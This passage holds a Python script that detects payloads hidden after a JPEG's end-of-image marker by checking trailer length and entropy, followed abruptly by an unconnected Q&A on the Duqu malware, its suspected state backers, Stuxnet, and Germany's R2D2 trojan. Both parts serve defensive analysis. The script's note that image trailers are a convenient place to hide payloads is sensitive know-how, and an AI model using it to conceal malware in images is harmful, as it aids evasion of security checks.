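ignored by image viewers, which is what makes it a convenient place to hide
a payload. Encrypted data also tends to have near-maximal byte entropy, so
a long, high-entropy trailer is a stronger signal than a short text one.
"""
import math
import struct

SOI = b"\xff\xd8"  # Start Of Image
EOI = b"\xff\xd9"  # End Of Image


def jpeg_trailer(data: bytes) -> bytes:
    """Walk the marker segments and return every byte after the EOI marker."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    pos, n = 2, len(data)
    while pos < n:
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos < n and data[pos] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos >= n:
            raise ValueError("truncated: marker byte missing")
        marker = data[pos]
        pos += 1
        if marker == 0xD9:                      # EOI: the rest is the trailer
            return data[pos:]
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length
            continue
        if pos + 2 > n:
            raise ValueError("truncated: segment length missing")
        seg_len = struct.unpack(">H", data[pos:pos + 2])[0]
        if seg_len < 2:
            raise ValueError(f"invalid segment length {seg_len} at offset {pos}")
        pos += seg_len
        if marker == 0xDA:  # SOS: entropy-coded data follows the header
            # Skip until the next real marker; FF00 is byte stuffing and
            # FF D0..D7 are restart markers, neither ends the scan.
            while pos < n:
                if data[pos] == 0xFF and pos + 1 < n:
                    nxt = data[pos + 1]
                    if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
                        pos += 2
                        continue
                    if nxt == 0xFF:
                        pos += 1
                        continue
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    total = len(buf)
    return -sum((c / total) * math.log2(c / total) for c in counts if c)


def scan_jpeg(data: bytes, min_len: int = 64, min_entropy: float = 7.0) -> dict:
    """Return trailer size and entropy, and whether it looks like a hidden payload."""
    trailer = jpeg_trailer(data)
    ent = shannon_entropy(trailer)
    return {
        "trailer_len": len(trailer),
        "trailer_entropy": round(ent, 3),
        "suspicious": len(trailer) >= min_len and ent >= min_entropy,
    }


def build_sample(trailer: bytes) -> bytes:
    """Constructed, minimal JPEG-shaped byte string (not a decodable image)."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    entropy_coded = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # contains stuffing and RST0
    return SOI + app0 + sos + entropy_coded + EOI + trailer


if __name__ == "__main__":
    clean = build_sample(b"")
    hidden = build_sample(bytes(range(256)) * 2)  # stands in for an encrypted blob
    print("clean :", scan_jpeg(clean))
    print("hidden:", scan_jpeg(hidden))
```

The thresholds in `scan_jpeg` are tunable assumptions: some legitimate tools append short metadata or padding after EOI, so length and entropy together reduce false positives, and a hit should be confirmed by inspecting the trailer rather than treated as proof on its own.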

Q: Wow. Does Duqu do anything else sneaky?
A: Yes. After 30 days, unless told otherwise by the C&C, Duqu will delete itself to limit evidence of the breach.

Q: Who is behind Duqu?
A: Unknown.

Q: What were they looking for, and why?
A: Unknown.

Q: What can you definitively tell us about Duqu?
A: The software components of "Operation Duqu" were made by a very skilled team of developers and exploit analysts.

Q: Can you speculate on Duqu's objectives?
A: Whatever it was, it must be very important to the interests of the nation state actor pulling the strings. In this actor's mind, the cost of disclosing a Windows kernel vulnerability is outweighed by the benefits. Only those with privileged information can accurately determine Duqu's true goals, unless and until an identifiable direct action results.

Q: So you think a government agency is behind Duqu?
A: Yes.

Q: Should a government actor use malware such as Duqu?
A: It doesn't appear to be up for a vote.

Q: What about Germany's R2D2 trojan?
A: R2D2 is a trojan written for police surveillance. It did not use zero-day exploits or drivers signed with stolen certificates from legitimate hardware vendors. R2D2 was commissioned by German authorities for normal police work.

Q: But police trojans are not good, right?
A: No, malware often finds a way of escaping control. It never seems like a good idea to us.

Q: How bad is R2D2?
A: R2D2 appears to have far overreached what is allowed by German law. It has created a legal and political mess in Germany, but not so much of a technical mess. Our system automation determined R2D2 should not be trusted on its own long before human analysts ever took notice of it. The thing that made R2D2 valuable to the police was its limited install base. It was not really innovative in a way that could be co-opted by criminals.

Q: Are Stuxnet/Duqu innovative?
A: Yes, very much so. Once the vulnerability is disclosed, we (and others) will need to devote numerous man-hours to creating strong generic detections for this new exploit. Other members of our Labs will need to datamine our file collections for software signed by C-Media in order to rescan them and process the results. Duqu creates technical headaches and the lessons learned will be adopted by criminals at some point.

Q: What about those that say that Duqu isn't related to Stuxnet?
A: Let's compare the similarities between the two operations.

• The installer exploits zero-day Windows kernel vulnerability(ies).
• Components are signed with stolen certificates.
• Highly targeted in a way that suggests advanced intelligence.

The technical development team that coded and built the infrastructure for Duqu may differ in part from the team that developed Stuxnet. The highly targeted nature of the attacks suggests a considerable amount of human intelligence work was involved. This intelligence work could have been done by the same or different analysts, but that hardly matters. Whatever the composition of the teams involved, the similarities between the operations would suggest a common nation state actor pulling the strings.

Q: Will we ever learn the identity of this nation state?
A: Doesn't seem likely… at least not anytime soon. The consequences of Duqu's wake discourage any sort of disclosure.

Q: Does this nation state actor have other operations in progress?
A: Unknown. But it wouldn't seem very surprising if so.

Q: Final question (for now): Operation Duqu used an e-mail attachment. Isn't that something that everybody should be on guard against? Why use such a basic attack methodology?
A: Because it works.